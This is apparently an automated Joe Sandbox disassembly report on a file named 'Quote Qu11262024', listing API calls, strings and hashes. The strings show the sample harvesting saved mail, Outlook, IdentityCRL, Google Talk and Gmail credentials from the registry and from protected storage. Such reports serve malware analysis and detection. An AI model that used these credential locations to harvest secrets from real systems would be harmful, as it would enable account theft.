                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                    • API String ID: 1197458902-317895162
                                                                                                    • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                    • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                    • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                    • String ID: h4ND
                                                                                                    • API String ID: 3662548030-3825183422
                                                                                                    • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                    • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                    • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                      • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                      • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                      • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                      • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                    • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                    • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                    • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                    • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044430B
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                      • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                      • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                      • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                      • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                      • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                    • memset.MSVCRT ref: 00444379
                                                                                                    • memset.MSVCRT ref: 00444394
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                    • strlen.MSVCRT ref: 004443DB
                                                                                                    • _strcmpi.MSVCRT ref: 00444401
                                                                                                    Strings
                                                                                                    • Store Root, xrefs: 004443A5
                                                                                                    • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                    • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                    • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                    • API String ID: 832325562-2578778931
                                                                                                    • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                    • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                    • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                    • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2012582556-3916222277
                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 344 4038bf-4038dd _mbscpy call 4023e5 342->344 343->344 345 4038a4-4038bc sprintf 343->345 344->334 345->344
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                    • String ID: %s@yahoo.com
                                                                                                    • API String ID: 317221925-3288273942
                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                      • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                    • API String ID: 3071782539-966475738
                                                                                                    • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                    • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 356 40ccd7-40cd06 ??2@YAPAXI@Z 357 40cd08-40cd0d 356->357 358 40cd0f 356->358 359 40cd11-40cd24 ??2@YAPAXI@Z 357->359 358->359 360 40cd26-40cd2d call 404025 359->360 361 40cd2f 359->361 363 40cd31-40cd57 360->363 361->363 365 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 363->365 366 40cd59-40cd60 DeleteObject 363->366 366->365
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                    • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                    • memset.MSVCRT ref: 0040CD96
                                                                                                    • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                    • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2054149589-0
                                                                                                    • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                    • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                    • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                    • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 373 44b40e-44b415 GetModuleHandleA 374 44b455 373->374 375 44b417-44b426 call 44b42b 373->375 377 44b457-44b45b 374->377 384 44b48d 375->384 385 44b428-44b433 GetProcAddress 375->385 379 44b45d-44b465 GetModuleHandleA 377->379 380 44b49a call 44b49f 377->380 383 44b467-44b46f 379->383 383->383 386 44b471-44b474 383->386 388 44b48e-44b496 384->388 385->374 389 44b435-44b442 VirtualProtect 385->389 386->377 387 44b476-44b478 386->387 390 44b47e-44b486 387->390 391 44b47a-44b47c 387->391 397 44b498 388->397 393 44b454 389->393 394 44b444-44b452 VirtualProtect 389->394 395 44b487-44b488 GetProcAddress 390->395 391->395 393->374 394->393 395->384 397->386
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                      • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                      • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                      • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                      • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                      • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                    • memset.MSVCRT ref: 00408620
                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                    • memset.MSVCRT ref: 00408671
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                    Strings
                                                                                                    • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                    • String ID: Software\Google\Google Talk\Accounts
                                                                                                    • API String ID: 1366857005-1079885057
                                                                                                    • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                    • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                    • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 435 40ba74 428->435 436 40ba6f-40ba72 428->436 429->422 429->423 430 40baa0-40bab3 call 407e30 437 40bab5-40bac1 430->437 438 40bafa-40bb09 SetCursor 430->438 439 40ba75-40ba76 call 40b5e5 435->439 436->439 440 40bac3-40bace 437->440 441 40bad8-40baf7 qsort 437->441 439->429 440->441 441->438 445->430 446->430 447->430 448->430 449->430
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor_mbsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 882979914-1578091866
                                                                                                    • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                    • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                    • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                      • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                      • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                      • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2618702711.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000007.00000002.2618702711.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099061454-0
                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                    • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
